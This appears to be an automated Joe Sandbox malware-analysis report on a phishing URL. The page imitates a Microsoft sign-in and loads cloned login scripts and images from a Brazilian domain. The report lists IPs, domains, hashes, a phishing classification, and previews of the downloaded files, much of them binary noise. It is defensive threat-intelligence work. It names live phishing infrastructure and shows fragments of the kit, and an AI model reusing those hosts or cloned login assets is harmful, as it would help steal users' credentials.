                                              https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.jschromecache_68.3.dr, chromecache_61.3.drfalse
                                                high
                                                http://www.json.org/json2.jschromecache_68.3.dr, chromecache_61.3.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  13.107.246.63
                                                  s-part-0035.t-0009.t-msedge.netUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  94.247.42.112
                                                  documerge.arroiodosilva.com.brGermany
                                                  34549MEER-ASmeerfarbigGmbHCoKGDEtrue
                                                  142.250.181.100
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  94.46.167.218
                                                  adrianocarreira.comPortugal
                                                  24768ALMOUROLTECPTfalse
                                                  IP
                                                  192.168.2.6
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1564020
                                                  Start date and time:2024-11-27 18:08:32 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 3m 7s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://adrianocarreira.com/team/index.html
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal72.phis.win@19/30@16/6
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.17.46, 74.125.205.84, 34.104.35.123, 172.217.17.74, 172.217.19.202, 172.217.17.42, 172.217.21.42, 172.217.19.10, 142.250.181.138, 172.217.19.234, 142.250.181.10, 142.250.181.74, 142.250.181.106, 172.217.19.170, 216.58.208.234, 199.232.214.172, 192.229.221.95, 20.190.147.1, 20.190.177.82, 20.190.177.21, 20.190.177.149, 20.190.177.83, 20.190.177.146, 20.190.177.84, 20.190.147.3, 142.250.181.42, 13.107.6.156, 172.217.17.35
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, clients2.google.com, ocsp.digicert.com, login.live.com, update.googleapis.com, csp.microsoft.com, azurefd-t-prod.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, portal-office365-com.b-0004.b-msedge.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: https://adrianocarreira.com/team/index.html
                                                  No simulations
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                  Category:downloaded
                                                  Size (bytes):673
                                                  Entropy (8bit):7.6596900876595075
                                                  Encrypted:false
                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):28
                                                  Entropy (8bit):4.307354922057605
                                                  Encrypted:false
                                                  SSDEEP:3:8Kiun9ks:8Kiun2s
                                                  MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                  SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                  SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                  SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwn8mA8PpCU4nxIFDdFbUVISBQ1Xevf9?alt=proto
                                                  Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (64966), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):353581
                                                  Entropy (8bit):6.031216582369238
                                                  Encrypted:false
                                                  SSDEEP:6144:tODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7TvoN:tKORVmptw6sCGA9gsJ/OR7VRWeSpRJN
                                                  MD5:0E02A57C10170D922C092645F4DE2A91
                                                  SHA1:F1CDDB2CFB2CBB6E27D573395F7E90646A7D9BBD
                                                  SHA-256:FF940EA196CED5FE4E9289817F2AA0E228F97E8BC3A2F4A1E903A9174DF52AB6
                                                  SHA-512:C3E30789F96543AB822E1839801B8B18A694D24E6C7B0DED55BB6D1B9C658B70C138A11F5F23E1B073D7B3A3BA9F2B0D3A57CFD240484E6626E629CB35EC89A9
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://adrianocarreira.com/team/index.html
                                                  Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>****---***</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.. background-color: #f4f4f4;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. color: #333;.. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABioAAALkCAYAAACRC231AAAgAElEQVR4Xuy9S8ttzbImdNa3T/0WL4ggNgQbNuzYsWPHI0qBKIJYIGhDBBvasKEdQbCj5aVU1EIoCrRQERVRwQIvUKKoICL+Dc/e25kZ8UQ8T2RkjjHnu9ba33rXfPf+1hwjR17iHpER4/Llr/t7//zv/+jw92Vcm//kQTnNy6Prl7g6x9GZz7A2Sp864ATc6VqDVYdot7a17fEwFL9YD+9mx972Ksw+bsLp/+SxNz0u/J4Q4es2/HEd6584q+gJf3fg08xYylf0UwJmhdGAEZAeJ3sQl9USrKPEfpD4u+HM5yofxvr4y0OT9UUHitCpjjUAT
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):3452
                                                  Entropy (8bit):5.117912766689607
                                                  Encrypted:false
                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://login.live.com/Me.htm?v=3
                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                  Category:dropped
                                                  Size (bytes):673
                                                  Entropy (8bit):7.6596900876595075
                                                  Encrypted:false
                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                  Category:downloaded
                                                  Size (bytes):621
                                                  Entropy (8bit):7.673946009263606
                                                  Encrypted:false
                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:downloaded
                                                  Size (bytes):689017
                                                  Entropy (8bit):4.210697599646938
                                                  Encrypted:false
                                                  SSDEEP:6144:rnQWWDY3mr16XRxcpuEhjMPRKkC0d7xyF0FA9OgoUE0HUN4oe+:rBWU3xhDKkTshoj5
                                                  MD5:3E89AE909C6A8D8C56396830471F3373
                                                  SHA1:2632F95A5BE7E4C589402BF76E800A8151CD036B
                                                  SHA-256:6665CA6A09F770C6679556EB86CF4234C8BDB0271049620E03199B34B4A16099
                                                  SHA-512:E7DBE4E95D58F48A0C8E3ED1F489DCF8FBF39C3DB27889813B43EE95454DECA2816AC1E195E61A844CC9351E04F97AFA271B37CAB3FC522809CE2BE85CC1B8F0
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js
                                                  Preview:.!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):16
                                                  Entropy (8bit):3.452819531114783
                                                  Encrypted:false
                                                  SSDEEP:3:Has6Ln:6sCn
                                                  MD5:CD598D2DCE38CFBA2981425AFD8CC5FF
                                                  SHA1:56C8577B18B89C77A6AC58B925F8ECAB11BEF02C
                                                  SHA-256:64BC0BCC655408713CCC3195B859007631C335758AAC8575658AC138509233E8
                                                  SHA-512:61797961E4747CA9CD7B3E6746E5243F7D9EF59B21B27911E974CEB68460C71ED438FEAAE6C7E1BC77A50E687D63A26623DB0AC1204DEAC60D094EFD0271C6FA
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAk15NYMVcv3uBIFDa8aOOA=?alt=proto
                                                  Preview:CgkKBw2vGjjgGgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (46599)
                                                  Category:downloaded
                                                  Size (bytes):142378
                                                  Entropy (8bit):5.430493353312546
                                                  Encrypted:false
                                                  SSDEEP:1536:Py0DWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGl:qgD1g/Mq5L9EveUynbBwsccuA
                                                  MD5:80D06E1B20E65B4FD1745946BF94FB7D
                                                  SHA1:934D05628A9F0373887ED0F8CDADC4CA675F5FD9
                                                  SHA-256:ACCE6D727B0D1C84F09C5757643A0560D2238A5EA731069A48AECC8E0393810D
                                                  SHA-512:5C47F6F8539FD31BE4A5FAD078482D6BFC31F997EDD4CFFC456E6B16CCBF2D4AE2BB1AF5CA4A1741F46BD3195F8331A1B644C686AF4D44478ED110D4EDB117F3
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                  Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                  Category:downloaded
                                                  Size (bytes):17174
                                                  Entropy (8bit):2.9129715116732746
                                                  Encrypted:false
                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                  Category:downloaded
                                                  Size (bytes):1435
                                                  Entropy (8bit):7.8613342322590265
                                                  Encrypted:false
                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://documerger.afua.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):315
                                                  Entropy (8bit):5.0572271090563765
                                                  Encrypted:false
                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://adrianocarreira.com/favicon.ico
                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                  Category:dropped
                                                  Size (bytes):1435
                                                  Entropy (8bit):7.8613342322590265
                                                  Encrypted:false
                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):689017
                                                  Entropy (8bit):4.210697599646938
                                                  Encrypted:false
                                                  SSDEEP:6144:rnQWWDY3mr16XRxcpuEhjMPRKkC0d7xyF0FA9OgoUE0HUN4oe+:rBWU3xhDKkTshoj5
                                                  MD5:3E89AE909C6A8D8C56396830471F3373
                                                  SHA1:2632F95A5BE7E4C589402BF76E800A8151CD036B
                                                  SHA-256:6665CA6A09F770C6679556EB86CF4234C8BDB0271049620E03199B34B4A16099
                                                  SHA-512:E7DBE4E95D58F48A0C8E3ED1F489DCF8FBF39C3DB27889813B43EE95454DECA2816AC1E195E61A844CC9351E04F97AFA271B37CAB3FC522809CE2BE85CC1B8F0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                  Category:dropped
                                                  Size (bytes):17174
                                                  Entropy (8bit):2.9129715116732746
                                                  Encrypted:false
                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
